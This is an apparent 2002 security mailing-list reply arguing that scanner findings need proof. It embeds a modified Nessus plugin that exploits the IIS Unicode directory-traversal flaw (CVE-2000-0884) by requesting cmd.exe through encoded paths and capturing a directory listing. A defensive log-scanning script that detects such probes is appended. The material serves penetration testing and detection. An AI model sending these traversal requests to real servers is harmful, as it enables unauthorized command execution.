weed out the false positives...I realize that seems overly simplistic; however, your reports to management (and clients) need to be clean of any false positives.  I don't report a vulnerability unless I have a screenshot or packet capture to *prove* that I could compromise the machine.  Much of the "screenshotting" can be automated in Nessus (i.e. throw a display() call into your script and make it a part of the report).  See modified iis_dir_traversal.nasl below.  Another point that should be made to management is that 20 false positives is better than one false negative...And ISS is rife with false negatives...
 
I'm on a soapbox now...but management should also understand that NESSUS, ISS, and other scanners are not a silver bullet.  Hell, a chimpanzee can click a "start" button...it's the human intervention and analysis that makes the penetration test a success.  Nessus gives you the most "raw" and useful data to begin your "real work" with....
 
# Approved 22Apr01 jao (replaces older version)
 
#
# This script was first written Renaud Deraison then
# completely re-written by HD Moore
#
# See the Nessus Scripts License for details
#
 
if(description)
{
 script_id(10537);
 script_cve_id("CVE-2000-0884");
 name["english"] = "IIS directory traversal";
 script_name(english:name["english"]);
 
 desc["english"] = "
The remote IIS server allows anyone to execute arbitrary commands
by adding a unicode representation for the slash character
in the requested path.
 
Solution:  See MS advisory MS 00-078
Risk factor: High";
 
 script_description(english:desc["english"]);
 
 summary["english"] = "Determines if arbitrary commands can be executed Thanks to IIS";
 
 script_summary(english:summary["english"]);
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2001 H D Moore");
 family["english"] = "CGI abuses";
 script_family(english:family["english"]);
 script_dependencie("find_service.nes");
 script_require_ports("Services/www", 80);
 exit(0);
}
port = get_kb_item("Services/www");
if(!port)port = 80;
 
dir[0] = "/scripts/";
dir[1] = "/msadc/";
dir[2] = "/iisadmpwd/";
dir[3] = "/_vti_bin/";          # FP
dir[4] = "/_mem_bin/";          # FP
dir[5] = "/exchange/";          # OWA
dir[6] = "/pbserver/";          # Win2K
dir[7] = "/rpc/";               # Win2K
dir[8] = "/cgi-bin/";
dir[9] = "/";
 
uni[0] = "%c0%af";
uni[1] = "%c0%9v";
uni[2] = "%c1%c1";
uni[3] = "%c0%qf";
uni[4] = "%c1%8s";
uni[5] = "%c1%9c";
uni[6] = "%c1%pc";
uni[7] = "%c1%1c";
uni[8] = "%c0%2f";
uni[9] = "%e0%80%af";
uni[10] = "%cg%qf";
uni[11] = "%bg%qf";
uni[12] = "%cg%9v";
uni[13] = "%e0%80%qe";
uni[14] = "%dg%7g%ae";
uni[15] = "%cg%9u";
uni[16] = "%dg%o0%ae";
uni[17] = "%d1%9c";
uni[18] = "%cg%af";
uni[19] = "%ch%8s";
 

function check(req)
{
 soc = open_sock_tcp(port);
 if(soc)
 {
 req = http_get(item:req, port:port);
 send(socket:soc, data:req);
 r = recv(socket:soc, length:10240);
 close(soc);
 # A directory listing in the response is the proof that the command ran
 pat = "<DIR>";
 pat2 = "Directory of C";
 
 if((pat >< r) || (pat2 >< r)){
        mypattern = r;          # keep the raw response as the "screenshot" for the report
        return(1);
        }
 }
 return(0);
}
 
hostip = get_host_ip();
total_warning = "";
totaldirs = 0;
cmd = "/winnt/system32/cmd.exe?/c+dir+c:\\";
# Try every directory with every encoding; record each URL that returned a listing
for(d=0;dir[d];d=d+1)
{
        for(u=0;uni[u];u=u+1)
        {
                url = string(dir[d], "..", uni[u], "..", uni[u], "..", uni[u], "..", uni[u], "..", uni[u], "..", cmd);
                if(check(req:url)) {
                    total_warning = string (total_warning, "\n" , "http://", hostip, url);
                    totaldirs = totaldirs + 1;
                }
        }
}
 

# Report once, listing the working URLs with the captured response appended as evidence
if (totaldirs > 0) {
    total_warning = string (total_warning, "\n\n" , "were found to yield a remote shell\n", "\n\nScreenshot:\n\n", mypattern);
    security_hole(port:port, data:total_warning);
}
 

 
 
"Knowledge will forever govern ignorance, and a people who mean to be their own governors, must arm themselves with the power knowledge gives. A popular government without popular information or the means of acquiring it, is but a prologue to a farce or a tragedy or perhaps both."
--James Madison
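An added example, not part of the original thread or of Nessus: a defender-side check that scans constructed IIS W3C log lines for the overlong-UTF-8 traversal probes the script above sends, decoding the %c0%af / %c1%9c / %e0%80%af forms the way a lenient decoder would, so each hit can be tied to a 200 (the request worked) or a 404 (probe only) in the logs. The log field order is an assumption.

```python
import re

# Constructed sample IIS W3C log lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
SAMPLE_LOG = """\
2002-07-22 18:29:01 10.0.0.5 GET /scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2002-07-22 18:29:02 10.0.0.5 GET /msadc/..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe /c+dir+c:\\ 404
2002-07-22 18:30:10 10.0.0.9 GET /images/logo%20big.gif - 200
"""
PCT = re.compile(r"%([0-9A-Fa-f]{2})")
TRAVERSAL = re.compile(r"\.\.[\\/]")          # applied after decoding, so ..%c0%af.. is caught
CMD_SHELL = re.compile(r"cmd\.exe$", re.IGNORECASE)

def percent_decode_bytes(raw):
    """Turn %XX escapes into bytes; malformed escapes such as %c0%9v stay literal."""
    buf, i = bytearray(), 0
    while i < len(raw):
        m = PCT.match(raw, i)
        buf.extend(bytes([int(m.group(1), 16)]) if m else raw[i].encode("latin-1", "replace"))
        i = m.end() if m else i + 1
    return bytes(buf)

def lenient_utf8_decode(data):
    """Lenient 2/3-byte UTF-8 decode that accepts overlong forms (C0 AF -> '/'); returns (text, overlong_seen)."""
    out, overlong, i = [], False, 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1; continue
        need, cp = (1, b & 0x1F) if b < 0xE0 else (2, b & 0x0F)
        conts = data[i + 1:i + 1 + need]
        if b < 0xC0 or b > 0xEF or len(conts) < need or any(c & 0xC0 != 0x80 for c in conts):
            out.append("?"); i += 1; continue   # stray or invalid byte: keep it opaque
        for c in conts:
            cp = (cp << 6) | (c & 0x3F)
        overlong = overlong or cp < (0x80, 0x800)[need - 1]   # value would fit in fewer bytes
        out.append(chr(cp)); i += 1 + need
    return "".join(out), overlong

def classify_request(uri_stem):
    """Findings for one cs-uri-stem: overlong encoding, dot-dot traversal, cmd.exe target."""
    text, overlong = lenient_utf8_decode(percent_decode_bytes(uri_stem))
    checks = [("overlong-utf8", overlong), ("dot-dot-traversal", TRAVERSAL.search(text)),
              ("cmd.exe-target", CMD_SHELL.search(text))]
    return [name for name, hit in checks if hit]

def scan_iis_log(log_text):
    """One record per suspicious request; sc-status separates a 200 (worked) from a 404 (probe only)."""
    hits = []
    for f in (line.split() for line in log_text.splitlines()):
        findings = classify_request(f[4]) if len(f) >= 7 else []
        if findings:
            hits.append({"client": f[2], "stem": f[4], "status": f[6], "findings": findings})
    return hits
```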
----- Original Message -----
From: Tim Sailer
Sent: Monday, July 22, 2002 6:29 PM
Subject: false positives

Folks,
  I'm getting serious pressure from Management to switch from Nessus
to ISS. One of the reasons being is that they claim that Nessus is
clouding any real issues with false positives. Does anyone else
have the same problem, and if so, how are you getting around it?

Tim

--
Tim Sailer <[EMAIL PROTECTED]>
Brookhaven National Laboratory  (631) 344-3001
